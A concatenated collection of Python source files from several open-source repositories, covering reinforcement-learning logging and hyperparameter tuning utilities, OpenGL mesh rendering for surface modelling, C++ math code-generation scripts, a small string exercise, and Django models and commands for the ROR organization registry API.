shorthand = self._handle_shorthand(key, shorthand)
if not isinstance(vals, list):
vals = [vals]
self.keys.append(key)
self.vals.append(vals)
self.shs.append(shorthand)
self.default_vals.append(vals[0] if default is None else default)
def _check_key(self, key):
"""Checks key is valid. """
assert isinstance(key, str), "Key must be a string."
assert key[0].isalnum(), "First letter of key mus be alphanumeric."
def _handle_shorthand(self, key, shorthand):
"""Handles the creation of shorthands """
assert shorthand is None or isinstance(shorthand, str), \
"Shorthand must be None or string."
if shorthand is None:
shorthand = "".join(ch for ch in key[:3] if ch.isalnum())
assert shorthand[0].isalnum(), \
"Shorthand must start with at least one alphanumeric letter."
return shorthand
def print_info(self):
"""Prints a message containing details of tuner (i.e. current
hyperparameters and their values)
"""
print(self.thick_line)
print(f"{self.__class__.__name__} Info:")
table = PrettyTable()
table.title = f"Tuner - {self.name}"
headers = ["key", "values", "shorthand", "default"]
table.field_names = headers
data = zip(self.keys, self.vals, self.shs, self.default_vals)
for k, v, s, d in data:
v_print = 'dist' if callable(v) else v
d_print = 'dist' if callable(d) else d
table.add_row([k, v_print, s, d_print])
num_exps = self.get_num_exps()
print("\n", table, "\n")
print(f"Seeds: {self.seeds}")
print(f"Total number of variants, ignoring seeds: {num_exps}")
print("Total number of variants, including seeds: "
f"{num_exps * len(self.seeds)}")
print(self.thick_line)
def get_num_exps(self):
"""Returns total number of experiments, not including seeds, that
will be run
"""
return int(np.prod([len(v) for v in self.vals]))
def print_results(self, results):
"""Prints results in a nice table
Arguments
---------
results : list
variant experiment result dicts
"""
table = PrettyTable()
table.title = "Final results for all experiments"
any_res = results[0]
headers = list(any_res.keys())
table.field_names = headers
for var_result in results:
row = []
for k in headers:
row.append(var_result[k])
table.add_row(row)
print("\n{table}\n")
def write_results(self, results, data_dir):
"""Writes results to file
Arguments
---------
results : list
list of variant experiment result dicts
data_dir : str
directory to store data, if None uses current working directory
"""
output_fname = self.name + "_results.txt"
if data_dir is not None:
output_fname = osp.join(data_dir, output_fname)
headers = list(results[0].keys())
header_row = "\t".join(headers) + "\n"
with open(output_fname, "w") as fout:
fout.write(header_row)
for var_result in results:
row = []
for k in headers:
v = var_result[k]
vstr = "%.3g" % v if isinstance(v, float) else str(v)
row.append(vstr)
fout.write("\t".join(row) + "\n")
def name_variant(self, variant):
"""Get the name of variant, where the names is the HPGridTuner
name followed by shorthand of each hyperparam and value, all
seperated by underscores
e.g.
gridName_h1_v1_h2_v2_h3_v3 ...
Except:
1. does not include hyperparams with only a single value
2. does not include seed
3. if value is bool only include hyperparam name if val is true
"""
var_name = self.name
for k, v, sh in zip(self.keys, self.vals, self.shs):
if k != 'seed' and (callable(v) or len(v) > 1):
variant_val = variant[k]
if not callable(v) and \
all([isinstance(val, bool) for val in v]):
var_name += ("_" + sh) if variant_val else ''
elif callable(v):
if isinstance(variant_val, float):
val_format = "{:.3f}".format(variant_val)
else:
val_format = str(variant_val)
var_name += ("_" + sh + "_" + str(val_format))
else:
var_name += ("_" + sh + "_" + str(variant_val))
return var_name
def _run_variant(self, args):
"""Runs a single hyperparameter setting variant with algo for each
seed.
"""
exp_num, exp_name, variant, agent_cls = args
print(f"{self.thick_line}\n{self.name} experiment "
f"{exp_num} of {self.num_exps}")
trial_num = 1
trial_results = []
for seed in self.seeds:
print(f"{self.line}\n>>> Running trial {trial_num} of"
f" {len(self.seeds)}")
variant["seed"] = seed
var_result = call_experiment(agent_cls,
exp_name,
**variant)
trial_results.append(var_result)
trial_num += 1
print(self.line)
print(f"{exp_name} experiment complete")
print(self.thick_line)
def sort_results(self, results, metric):
"""Sorts results by a given metric """
sorted_results = sorted(results, key=lambda k: k[metric], reverse=True)
return sorted_results
```
#### File: rltorch/utils/rl_logger.py
```python
import time
import os.path as osp
from prettytable import PrettyTable
import rltorch.utils.file_utils as fu
from rltorch.user_config import DEFAULT_DATA_DIR
RESULTS_FILE_NAME = "results"
RESULTS_FILE_EXT = "tsv"
CONFIG_FILE_NAME = "config"
CONFIG_FILE_EXT = "yaml"
CONFIG_FILE = f"{CONFIG_FILE_NAME}.{CONFIG_FILE_EXT}"
RESULTS_FILE = f"{RESULTS_FILE_NAME}.{RESULTS_FILE_EXT}"
def get_exp_name(env_name, alg):
ts = time.strftime("%Y%m%d-%H%M%S")
return f"{alg}_{env_name}_{ts}"
class RLLogger:
def __init__(self, env_name, alg=None, parent_dir=None):
self.env_name = env_name
self.alg = alg
self.parent_dir = parent_dir
self.setup_save_file()
self.headers = []
self.log_buffer = dict()
self.headers_written = False
def setup_save_file(self):
exp_name = get_exp_name(self.alg, self.env_name)
if self.parent_dir:
parent_dir = osp.join(DEFAULT_DATA_DIR, self.parent_dir)
fu.make_dir(parent_dir)
else:
parent_dir = DEFAULT_DATA_DIR
self.save_dir = osp.join(parent_dir, exp_name)
fu.make_dir(self.save_dir)
self.save_file_path = fu.generate_file_path(self.save_dir,
RESULTS_FILE_NAME,
RESULTS_FILE_EXT)
def get_save_path(self, filename=None, ext=None):
if filename is None:
filename = get_exp_name(self.env_name, self.alg)
return fu.generate_file_path(self.save_dir, filename, ext)
def save_config(self, cfg):
cfg_file = self.get_save_path(CONFIG_FILE_NAME, CONFIG_FILE_EXT)
fu.write_yaml(cfg_file, cfg)
def add_header(self, header):
assert header not in self.headers
self.headers.append(header)
def log(self, header, value):
if not self.headers_written and header not in self.headers:
self.headers.append(header)
else:
assert header in self.headers, \
"Cannot log value of new header, use add_header first."
self.log_buffer[header] = value
def flush(self, display=False):
if display:
self.display()
save_file = open(self.save_file_path, "a+")
if not self.headers_written:
save_file.write("\t".join(self.headers) + "\n")
self.headers_written = True
row = []
for header in self.headers:
row.append(str(self.log_buffer[header]))
save_file.write("\t".join(row) + "\n")
save_file.close()
def display(self):
table = PrettyTable()
table.field_name = ["Metric", "Value"]
for header in self.headers:
val = self.log_buffer[header]
val = f"{val:.6f}" if isinstance(val, float) else str(val)
table.add_row([header, val])
print()
print(table)
print()
```
#### File: rltorch/utils/stat_utils.py
```python
import math
import numpy as np
class StatTracker:
"""A class for tracking the running mean and variance.
Uses the Welford algorithm for running means, var and stdev:
https://en.wikipedia.org/wiki/Algorithms_for_calculating_variance
Also tracks the moving mean, var and stdev over a specific window
size (default=100)
"""
def __init__(self, window=100):
self.window = window
self.ptr = 0
self.value_buffer = np.zeros(window, dtype=np.float32)
self.min_val = math.inf
self.max_val = -math.inf
self.total = 0
self.mean = 0
self.M2 = 0
self.n = 0
def update(self, x):
# handle total running values
self.min_val = min(self.min_val, x)
self.max_val = max(self.max_val, x)
self.total += x
self.n += 1
delta = x - self.mean
self.mean += delta / self.n
delta2 = x - self.mean
self.M2 += delta * delta2
# handle moving values
self.value_buffer[self.ptr] = x
self.ptr = (self.ptr+1) % self.window
@property
def var(self):
if self.n <= 1:
return 0
return self.M2 / self.n
@property
def stdev(self):
return math.sqrt(self.var)
@property
def moving_mean(self):
if self.n < self.window:
return self.value_buffer[:self.ptr].mean()
return self.value_buffer.mean()
@property
def moving_var(self):
if self.n < self.window:
return self.value_buffer[:self.ptr].var()
return self.value_buffer.var()
@property
def moving_stdev(self):
if self.n < self.window:
return self.value_buffer[:self.ptr].std()
return self.value_buffer.std()
@property
def moving_max(self):
if self.n < self.window:
return self.value_buffer[:self.ptr].max()
return self.value_buffer.max()
@property
def moving_min(self):
if self.n < self.window:
return self.value_buffer[:self.ptr].min()
return self.value_buffer.min()
``` |
{
"source": "JJscott/ARAP_Surface_Modelling",
"score": 2
} |
#### File: JJscott/ARAP_Surface_Modelling/geometry.py
```python
import pygloo
from pygloo import *
from ctypes import *
from simpleShader import makeProgram
# Math
#
from math import *
import random
import numpy as np
def _flatten_list(l):
return [e for row in l for e in row]
class Geometry(object):
solid_shader = GLuint(0)
wire_shader = GLuint(0)
flat_shader = GLuint(0)
def __init__(self, gl, v=[], vtf=[], f=[]):
if not Geometry.solid_shader:
Geometry.solid_shader = makeProgram(gl, "330 core", [GL_VERTEX_SHADER, GL_GEOMETRY_SHADER, GL_FRAGMENT_SHADER],
open("shaders/solid_shader.glsl").read())
if not Geometry.wire_shader:
Geometry.wire_shader = makeProgram(gl, "330 core", [GL_VERTEX_SHADER, GL_GEOMETRY_SHADER, GL_FRAGMENT_SHADER],
open("shaders/wireframe_shader.glsl").read())
if not Geometry.flat_shader:
Geometry.flat_shader = makeProgram(gl, "330 core", [GL_VERTEX_SHADER, GL_FRAGMENT_SHADER],
open("shaders/flat_color_shader.glsl").read())
self.verts = v
self.vertToFaces = vtf
self.faces = f
self.selected = []
self.constrained = []
# Creating the VAO and VBO(s) for mesh
#
self.vao = GLuint(0)
gl.glGenVertexArrays(1, self.vao)
gl.glBindVertexArray(self.vao)
# Index IBO
idx_array = pygloo.c_array(GLuint, _flatten_list(self.faces))
self.ibo = GLuint(0)
self.ibo_size = len(idx_array)
gl.glGenBuffers(1, self.ibo)
gl.glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.ibo);
gl.glBufferData(GL_ELEMENT_ARRAY_BUFFER, sizeof(idx_array), idx_array, GL_STATIC_DRAW);
# Vertex Position VBO
self.vbo_pos = GLuint(0)
gl.glGenBuffers(1, self.vbo_pos)
gl.glBindVertexArray(0)
# Creating the VAO(s) for selected/constrained points
#
# Selected
self.vao_selected = GLuint(0)
gl.glGenVertexArrays(1, self.vao_selected)
gl.glBindVertexArray(self.vao_selected)
self.ibo_selected = GLuint(0)
gl.glGenBuffers(1, self.ibo_selected)
# Constrained
self.vao_constrained = GLuint(0)
gl.glGenVertexArrays(1, self.vao_constrained)
gl.glBindVertexArray(self.vao_constrained)
self.ibo_constrained = GLuint(0)
gl.glGenBuffers(1, self.ibo_constrained)
# Make the update
self.update(gl)
# Because we are going to be changing the positions of the verticies alot
# as well as the selected/constrained points, this is a helper method that
# is run occasionally
def update(self, gl):
# Update vertex position information
#
gl.glBindVertexArray(self.vao)
# Vertex Position VBO (pos 0)
pos_array = pygloo.c_array(GLfloat, _flatten_list(self.verts))
gl.glBindBuffer(GL_ARRAY_BUFFER, self.vbo_pos)
gl.glBufferData(GL_ARRAY_BUFFER, sizeof(pos_array), pos_array, GL_STREAM_DRAW)
gl.glEnableVertexAttribArray(0)
gl.glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 0, 0)
# Update Selected/Constrained information
#
gl.glBindVertexArray(self.vao_selected)
idx_array = pygloo.c_array(GLuint, self.selected)
gl.glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.ibo_selected);
gl.glBufferData(GL_ELEMENT_ARRAY_BUFFER, sizeof(idx_array), idx_array, GL_STREAM_DRAW);
gl.glBindBuffer(GL_ARRAY_BUFFER, self.vbo_pos)
gl.glEnableVertexAttribArray(0)
gl.glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 0, 0)
gl.glBindVertexArray(self.vao_constrained)
idx_array = pygloo.c_array(GLuint, self.constrained)
gl.glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.ibo_constrained);
gl.glBufferData(GL_ELEMENT_ARRAY_BUFFER, sizeof(idx_array), idx_array, GL_STREAM_DRAW);
gl.glBindBuffer(GL_ARRAY_BUFFER, self.vbo_pos)
gl.glEnableVertexAttribArray(0)
gl.glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 0, 0)
# Cleanup
gl.glBindVertexArray(0)
def render(self, gl, mv, proj, wireframe=False):
# Render Model
#
gl.glUseProgram(Geometry.solid_shader)
gl.glBindVertexArray(self.vao)
gl.glUniformMatrix4fv(gl.glGetUniformLocation(Geometry.solid_shader, "modelViewMatrix"), 1, True, pygloo.c_array(GLfloat, _flatten_list(mv)))
gl.glUniformMatrix4fv(gl.glGetUniformLocation(Geometry.solid_shader, "projectionMatrix"), 1, True, pygloo.c_array(GLfloat, _flatten_list(proj)))
gl.glDrawElements(GL_TRIANGLES, self.ibo_size, GL_UNSIGNED_INT, 0)
gl.glBindVertexArray(0)
if wireframe:
# Render
#
gl.glEnable(GL_LINE_SMOOTH)
gl.glUseProgram(Geometry.wire_shader)
gl.glBindVertexArray(self.vao)
gl.glUniformMatrix4fv(gl.glGetUniformLocation(Geometry.wire_shader, "modelViewMatrix"), 1, True, pygloo.c_array(GLfloat, _flatten_list(mv)))
gl.glUniformMatrix4fv(gl.glGetUniformLocation(Geometry.wire_shader, "projectionMatrix"), 1, True, pygloo.c_array(GLfloat, _flatten_list(proj)))
gl.glDrawElements(GL_TRIANGLES, self.ibo_size, GL_UNSIGNED_INT, 0)
gl.glBindVertexArray(0)
# Render selected and constrained points
#
gl.glPointSize(5.0)
gl.glUseProgram(Geometry.flat_shader)
gl.glBindVertexArray(self.vao_selected)
gl.glUniform3fv(gl.glGetUniformLocation(Geometry.flat_shader, "color"), 1, pygloo.c_array(GLfloat, [1.0, 1.0, 0.0]))
gl.glUniformMatrix4fv(gl.glGetUniformLocation(Geometry.flat_shader, "modelViewMatrix"), 1, True, pygloo.c_array(GLfloat, _flatten_list(mv)))
gl.glUniformMatrix4fv(gl.glGetUniformLocation(Geometry.flat_shader, "projectionMatrix"), 1, True, pygloo.c_array(GLfloat, _flatten_list(proj)))
gl.glDrawElements(GL_POINTS, len(self.selected), GL_UNSIGNED_INT, 0)
gl.glBindVertexArray(self.vao_constrained)
gl.glUniform3fv(gl.glGetUniformLocation(Geometry.flat_shader, "color"), 1, pygloo.c_array(GLfloat, [1.0, 0.0, 0.0]))
gl.glDrawElements(GL_POINTS, len(self.constrained), GL_UNSIGNED_INT, 0)
gl.glBindVertexArray(0)
@staticmethod
def from_OBJ(gl, s):
verts = []
vertToFaces = []
faces = []
for line in open(s, "r"):
vals = line.split()
if len(vals) > 0:
if vals[0] == "v":
v = map(float, vals[1:4])
verts.append(v)
vertToFaces.append([])
elif vals[0] == "f":
f = map(lambda x : int(x.split("/")[0])-1, vals[1:4])
map(lambda x : vertToFaces[x].append(len(faces)), f)
faces.append(f)
return Geometry(gl, verts, vertToFaces, faces)
class mat4:
@staticmethod
def identity():
return np.asarray([
[1, 0, 0, 0,],
[0, 1, 0, 0,],
[0, 0, 1, 0,],
[0, 0, 0, 1]])
@staticmethod
def translate(tx, ty, tz):
return np.asarray([
[1, 0, 0, tx,],
[0, 1, 0, ty,],
[0, 0, 1, tz,],
[0, 0, 0, 1]])
@staticmethod
def scale(sx, sy, sz):
return np.asarray([
[sx, 0, 0, 0,],
[0, sy, 0, 0,],
[0, 0, sz, 0,],
[0, 0, 0, 1]])
@staticmethod
def rotateX(a):
return np.asarray([
[1, 0, 0, 0,],
[0, cos(a), -sin(a),0,],
[0, sin(a), cos(a), 0,],
[0, 0, 0, 1]])
@staticmethod
def rotateY(a):
return np.asarray([
[cos(a),0, sin(a), 0,],
[0, 1, 0, 0,],
[-sin(a),0, cos(a), 0,],
[0, 0, 0, 1]])
@staticmethod
def rotateZ(a):
return np.asarray([
[cos(a), -sin(a),0, 0,],
[sin(a), cos(a), 0, 0,],
[0, 0, 1, 0,],
[0, 0, 0, 1]])
@staticmethod
def perspectiveProjection(fovy, aspect, zNear, zFar):
f = cos(fovy / 2) / sin(fovy / 2);
return np.asarray([
[f / aspect,0, 0, 0,],
[0, f, 0, 0,],
[0, 0, (zFar + zNear) / (zNear - zFar), (2 * zFar * zNear) / (zNear - zFar),],
[0, 0, -1, 0]])
```
#### File: JJscott/ARAP_Surface_Modelling/simpleShader.py
```python
import pygloo
from pygloo import *
from ctypes import *
'''
Use example:
prog = makeProgram('330 compatibility', [GL_VERTEX_SHADER, GL_GEOMETRY_SHADER, GL_FRAGMENT_SHADER], shader_source)
'''
class ShaderError(Exception):
def __init__(self, msg = 'Generic shader error'):
Exception.__init__(self, msg)
# }
# }
class ShaderCompileError(ShaderError):
def __init__(self, msg = 'Shader compilation failed'):
ShaderError.__init__(self, msg)
# }
# }
class ShaderLinkError(ShaderError):
def __init__(self, msg = 'Shader program linking failed'):
ShaderError.__init__(self, msg)
# }
# }
def printShaderInfoLog(gl, obj):
loglen = GLint(0)
gl.glGetShaderiv(obj, GL_INFO_LOG_LENGTH, loglen)
if loglen > 1:
log = create_string_buffer(loglen.value)
loglen2 = GLint(0)
gl.glGetShaderInfoLog(obj, loglen, loglen2, log)
print 'Shader:\n', log.value
# }
# }
def printProgramInfoLog(gl, obj):
loglen = GLint(0)
gl.glGetProgramiv(obj, GL_INFO_LOG_LENGTH, loglen)
if loglen > 1:
log = create_string_buffer(loglen.value)
loglen2 = GLint(0)
gl.glGetProgramInfoLog(obj, loglen, loglen2, log)
print 'Program:\n', log.value
# }
# }
def compileShader(gl, stype, text):
shader = gl.glCreateShader(stype)
text = create_string_buffer(text)
ptext = cast(pointer(text), POINTER(c_char))
gl.glShaderSource(shader, 1, pointer(ptext), POINTER(GLint)())
try:
gl.glCompileShader(shader)
except GLError:
pass
# }
compile_status = GLint(0)
gl.glGetShaderiv(shader, GL_COMPILE_STATUS, compile_status)
printShaderInfoLog(gl, shader)
if not compile_status.value:
raise ShaderCompileError()
# }
return shader
# }
def linkProgram(gl, prog):
try:
gl.glLinkProgram(prog)
except GLError:
pass
# }
link_status = GLint(0)
gl.glGetProgramiv(prog, GL_LINK_STATUS, link_status)
printProgramInfoLog(gl, prog)
if not link_status.value:
raise ShaderLinkError()
# }
# }
def makeProgram(gl, profile, stypes, source):
prog = gl.glCreateProgram()
defines = dict({
(GL_VERTEX_SHADER, '_VERTEX_'),
(GL_GEOMETRY_SHADER, '_GEOMETRY_'),
(GL_TESS_CONTROL_SHADER, '_TESS_CONTROL_'),
(GL_TESS_EVALUATION_SHADER, '_TESS_EVALUATION_'),
(GL_FRAGMENT_SHADER, '_FRAGMENT_')
})
for stype in stypes:
text = '#version {profile}\n#define {sdef}\n{source}'.format(profile=profile, sdef=defines[stype], source=source)
shader = compileShader(gl, stype, text)
gl.glAttachShader(prog, shader)
# }
linkProgram(gl, prog)
print 'Shader program compiled and linked successfully'
return prog
# }
``` |
{
"source": "JJscott/single_header_math",
"score": 2
} |
#### File: single_header_math/scripts/matops.py
```python
assign_ops = [
('+=', 'add_assign', None),
('-=', 'sub_assign', None),
('*=', 'mul_assign', None),
('/=', 'div_assign', None)
]
unary_ops = [
('-', 'neg', 'negate')
]
binary_ops = [
('+', 'add', None),
('-', 'sub', None),
('*', 'mul', None),
('/', 'div', None)
]
assign_op_str = '''// mat {comment}
template <typename MatT1, typename MatT2, enable_if_matrix_compatible_t<MatT1, MatT2> = 0>
inline MatT1 & operator{op}(MatT1 &lhs, const MatT2 &rhs) {{
zip_with(detail::op::{func}(), lhs, rhs);
return lhs;
}}
// mat {comment} scalar
template <typename MatT, typename T, enable_if_matrix_scalar_compatible_t<MatT, T> = 0>
inline MatT & operator{op}(MatT &lhs, const T &rhs) {{
zip_with(detail::op::{func}(), lhs, repeat_vec_vec<T, mat_cols<MatT>::value, mat_rows<MatT>::value>(rhs));
return lhs;
}}
'''
unary_op_str= '''// mat {comment}
template <typename MatT, enable_if_matrix_t<MatT> = 0>
inline auto operator{op}(const MatT &rhs) {{
return zip_with<type_to_mat>(detail::op::{func}(), rhs);
}}
'''
binary_op_str = '''// mat {comment}
template <typename MatT1, typename MatT2, enable_if_matrix_compatible_t<MatT1, MatT2> = 0>
inline auto operator{op}(const MatT1 &lhs, const MatT2 &rhs) {{
return zip_with<type_to_mat>(detail::op::{func}(), lhs, rhs);
}}
// mat {comment} right scalar
template <typename MatT, typename T, enable_if_matrix_scalar_compatible_t<MatT, T> = 0>
inline auto operator{op}(const MatT &lhs, const T &rhs) {{
return zip_with<type_to_mat>(detail::op::{func}(), lhs, repeat_vec_vec<T, mat_cols<MatT>::value, mat_rows<MatT>::value>(rhs));
}}
// mat {comment} left scalar
template <typename MatT, typename T, enable_if_matrix_scalar_compatible_t<MatT, T> = 0>
inline auto operator{op}(const T &lhs, const MatT &rhs) {{
return zip_with<type_to_mat>(detail::op::{func}(), repeat_vec_vec<T, mat_cols<MatT>::value, mat_rows<MatT>::value>(lhs), rhs);
}}
'''
def main():
for op, func, comment in assign_ops:
print assign_op_str.format(op=op, func=func, comment = comment if comment is not None else func)
# }
for op, func, comment in unary_ops:
print unary_op_str.format(op=op, func=func, comment = comment if comment is not None else func)
# }
for op, func, comment in binary_ops:
print binary_op_str.format(op=op, func=func, comment = comment if comment is not None else func)
# }
# }
if __name__ == '__main__': main()
```
#### File: single_header_math/scripts/vecfns.py
```python
unary_fns = [
('sin', 'sin'),
('cos', 'cosine'),
('tan', 'tangent'),
('sec', 'secant'),
('csc', 'cosecant'),
('cot', 'cotangent'),
('asin', 'inverse sin'),
('acos', 'inverse cosine'),
('atan', 'inverse tangent'),
('asec', 'inverse secant'),
('acsc', 'inverse cosecant'),
('acot', 'inverse cotangent'),
('sinh', 'hyperbolic sin'),
('cosh', 'hyperbolic cosine'),
('tanh', 'hyperbolic tangent'),
('sech', 'hyperbolic secant'),
('csch', 'hyperbolic cosecant'),
('coth', 'hyperbolic cotangent'),
('asinh', 'inverse hyperbolic sin'),
('acosh', 'inverse hyperbolic cosine'),
('atanh', 'inverse hyperbolic tangent'),
('asech', 'inverse hyperbolic secant'),
('acsch', 'inverse hyperbolic cosecant'),
('acoth', 'inverse hyperbolic cotangent'),
('radians', 'degrees to radians'),
('degrees', 'radians to degrees'),
('exp', 'exp'),
('exp2', 'exp base 2'),
('expm1', 'exp(x) - 1'),
('log', 'log'),
('log2', 'log2'),
('log10', 'log10'),
('log1p', 'log(1 + x)'),
('sqrt', 'sqrt'),
('cbrt', 'cbrt'),
('abs', 'abs'),
('floor', 'floor'),
('ceil', 'ceil'),
('isnan', 'isnan'),
('isinf', 'isinf'),
('sign', 'sign'),
('fract', 'fract'),
# TODO etc
]
binary_fns = [
('atan', 'inverse tangent (2-arg)', 'y', 'x'),
('pow', 'pow', 'x', 'a'),
('mod', 'mod', 'x', 'm'),
('step', 'step', 'edge', 'x'),
# TODO etc
]
ternary_fns = [
('mix', 'mix', 'x1', 'x2', 't'),
('clamp', 'clamp', 'x', 'lower', 'upper'),
('smoothstep', 'smoothstep', 'edge0', 'edge1', 'x'),
# TODO etc
]
unary_fn_str = '''// vec {comment}
template <typename VecT, enable_if_vector_t<VecT> = 0>
inline auto {func}(const VecT &v) {{
using cgra::detail::scalars::{func};
return zip_with([](const auto &x) {{ return {func}(x); }}, v);
}}
'''
binary_fn_str = '''// vec {comment}
template <typename VecT1, typename VecT2, enable_if_vector_compatible_t<VecT1, VecT2> = 0>
inline auto {func}(const VecT1 &v{arg1}, const VecT2 &v{arg2}) {{
using cgra::detail::scalars::{func};
return zip_with([](const auto &x{arg1}, const auto &x{arg2}) {{ return {func}(x{arg1}, x{arg2}); }}, v{arg1}, v{arg2});
}}
// vec {comment} right scalar
template <typename VecT, typename T, enable_if_vector_scalar_compatible_t<VecT, T> = 0>
inline auto {func}(const VecT &v{arg1}, const T &{arg2}) {{
using cgra::detail::scalars::{func};
return zip_with([&](const auto &x{arg1}) {{ return {func}(x{arg1}, {arg2}); }}, v{arg1});
}}
// vec {comment} left scalar
template <typename VecT, typename T, enable_if_vector_scalar_compatible_t<VecT, T> = 0>
inline auto {func}(const T &{arg1}, const VecT &v{arg2}) {{
using cgra::detail::scalars::{func};
return zip_with([&](const auto &x{arg2}) {{ return {func}({arg1}, x{arg2}); }}, v{arg2});
}}
'''
ternary_fn_str = '''// vec {comment}
template <typename VecT1, typename VecT2, typename VecT3, enable_if_vector_compatible_t<VecT1, VecT2, VecT3> = 0>
inline auto {func}(const VecT1 &v{arg1}, const VecT2 &v{arg2}, const VecT3 &v{arg3}) {{
using cgra::detail::scalars::{func};
return zip_with([](const auto &x{arg1}, const auto &x{arg2}, const auto &x{arg3}) {{ return {func}(x{arg1}, x{arg2}, x{arg3}); }}, v{arg1}, v{arg2}, v{arg3});
}}
// vec {comment} ({arg3})-scalar
template <typename VecT1, typename VecT2, typename T3, enable_if_vector_compatible_t<VecT1, VecT2> = 0, enable_if_vector_scalar_compatible_t<VecT1, T3> = 0>
inline auto {func}(const VecT1 &v{arg1}, const VecT2 &v{arg2}, const T3 &{arg3}) {{
using cgra::detail::scalars::{func};
return zip_with([&](const auto &x{arg1}, const auto &x{arg2}) {{ return {func}(x{arg1}, x{arg2}, {arg3}); }}, v{arg1}, v{arg2});
}}
// vec {comment} ({arg2})-scalar
template <typename VecT1, typename T2, typename VecT3, enable_if_vector_compatible_t<VecT1, VecT3> = 0, enable_if_vector_scalar_compatible_t<VecT1, T2> = 0>
inline auto {func}(const VecT1 &v{arg1}, const T2 &{arg2}, const VecT3 &v{arg3}) {{
using cgra::detail::scalars::{func};
return zip_with([&](const auto &x{arg1}, const auto &x{arg3}) {{ return {func}(x{arg1}, {arg2}, x{arg3}); }}, v{arg1}, v{arg3});
}}
// vec {comment} ({arg2},{arg3})-scalar
template <typename VecT1, typename T2, typename T3, enable_if_vector_scalar_compatible_t<VecT1, T2> = 0, enable_if_vector_scalar_compatible_t<VecT1, T3> = 0>
inline auto {func}(const VecT1 &v{arg1}, const T2 &{arg2}, const T3 &{arg3}) {{
using cgra::detail::scalars::{func};
return zip_with([&](const auto &x{arg1}) {{ return {func}(x{arg1}, {arg2}, {arg3}); }}, v{arg1});
}}
// vec {comment} ({arg1})-scalar
template <typename T1, typename VecT2, typename VecT3, enable_if_vector_compatible_t<VecT2, VecT3> = 0, enable_if_vector_scalar_compatible_t<VecT2, T1> = 0>
inline auto {func}(const T1 &{arg1}, const VecT2 &v{arg2}, const VecT3 &v{arg3}) {{
using cgra::detail::scalars::{func};
return zip_with([&](const auto &x{arg2}, const auto &x{arg3}) {{ return {func}({arg1}, x{arg2}, x{arg3}); }}, v{arg2}, v{arg3});
}}
// vec {comment} ({arg1},{arg3})-scalar
template <typename T1, typename VecT2, typename T3, enable_if_vector_scalar_compatible_t<VecT2, T1> = 0, enable_if_vector_scalar_compatible_t<VecT2, T3> = 0>
inline auto {func}(const T1 &{arg1}, const VecT2 &v{arg2}, const T3 &{arg3}) {{
using cgra::detail::scalars::{func};
return zip_with([&](const auto &x{arg2}) {{ return {func}({arg1}, x{arg2}, {arg3}); }}, v{arg2});
}}
// vec {comment} ({arg1},{arg2})-scalar
template <typename T1, typename T2, typename VecT3, enable_if_vector_scalar_compatible_t<VecT3, T1> = 0, enable_if_vector_scalar_compatible_t<VecT3, T2> = 0>
inline auto {func}(const T1 &{arg1}, const T2 &{arg2}, const VecT3 &v{arg3}) {{
using cgra::detail::scalars::{func};
return zip_with([&](const auto &x{arg3}) {{ return {func}({arg1}, {arg2}, x{arg3}); }}, v{arg3});
}}
'''
def main():
for func, comment in unary_fns:
print unary_fn_str.format(func=func, comment=comment)
# }
for func, comment, arg1, arg2 in binary_fns:
print binary_fn_str.format(func=func, comment=comment, arg1=arg1, arg2=arg2)
# }
for func, comment, arg1, arg2, arg3 in ternary_fns:
print ternary_fn_str.format(func=func, comment=comment, arg1=arg1, arg2=arg2, arg3=arg3)
# }
# }
if __name__ == '__main__': main()
``` |
{
"source": "JJSerAnexinet/2021_python_selenium",
"score": 3
} |
#### File: 2021_python_selenium/Module_01/reto2_unique_char.py
```python
def unique_char (pal):
palabra = []
palabra[:0] = pal
print(palabra)
for index in range(len(palabra)):
if palabra.count(palabra[index]) == 1:
return index
elif index == len(palabra)-1:
return -1
palabra = "selenium"
print(unique_char(palabra))
``` |
{
"source": "jjshoe/ror-api",
"score": 2
} |
#### File: management/commands/upgrade.py
```python
from django.core.management.base import BaseCommand
from .downloadgrid import Command as DownloadGridCommand
from .convertgrid import Command as ConvertGridCommand
class Command(BaseCommand):
help = 'Generate up-to-date ror.zip from GRID data'
def handle(self, *args, **options):
DownloadGridCommand().handle(args, options)
ConvertGridCommand().handle(args, options)
```
#### File: ror-api/rorapi/models.py
```python
import pycountry
from rest_framework import serializers
#####################################################################
# Models #
#####################################################################
class Entity:
"""Generic model class"""
def __init__(self, base_object, attributes):
[setattr(self, a, getattr(base_object, a)) for a in attributes]
class ExternalIds:
"""A model class for storing external identifiers"""
def __init__(self, data):
for a in [
'ISNI', 'FundRef', 'HESA', 'UCAS', 'UKPRN', 'CNRS', 'OrgRef',
'Wikidata', 'GRID'
]:
try:
setattr(self, a, Entity(getattr(data, a),
['preferred', 'all']))
except AttributeError:
pass
class Organization(Entity):
"""Organization model class"""
def __init__(self, data):
super(Organization, self).__init__(data, [
'id', 'name', 'types', 'links', 'aliases', 'acronyms', 'status',
'wikipedia_url'
])
self.labels = [Entity(l, ['label', 'iso639']) for l in data.labels]
self.country = Entity(data.country, ['country_name', 'country_code'])
self.external_ids = ExternalIds(data.external_ids)
class TypeBucket:
"""A model class for type aggregation bucket"""
def __init__(self, data):
self.id = data.key.lower()
self.title = data.key
self.count = data.doc_count
class CountryBucket:
"""A model class for country aggregation bucket"""
def __init__(self, data):
self.id = data.key.lower()
country = pycountry.countries.get(alpha_2=data.key)
try:
self.title = country.official_name
except AttributeError:
self.title = country.name
self.count = data.doc_count
class Aggregations:
"""Aggregations model class"""
def __init__(self, data):
self.types = [TypeBucket(b) for b in data.types.buckets]
self.countries = [CountryBucket(b) for b in data.countries.buckets]
class ListResult:
"""A model class for the list of organizations returned from the search"""
def __init__(self, data):
self.number_of_results = data.hits.total
self.time_taken = data.took
self.items = [Organization(x) for x in data]
self.meta = Aggregations(data.aggregations)
class MatchedOrganization:
"""A model class for an organization matched based on an affiliation
string"""
def __init__(self, data):
self.substring = data.substring
self.score = data.score
self.matching_type = data.matching_type
self.chosen = data.chosen
self.organization = data.organization
class MatchingResult:
"""A model class for the result of affiliation matching"""
def __init__(self, data):
self.number_of_results = len(data)
self.items = [MatchedOrganization(x) for x in data]
class Errors:
"""Errors model class"""
def __init__(self, errors):
self.errors = errors
######################################################################
# Serializers #
######################################################################
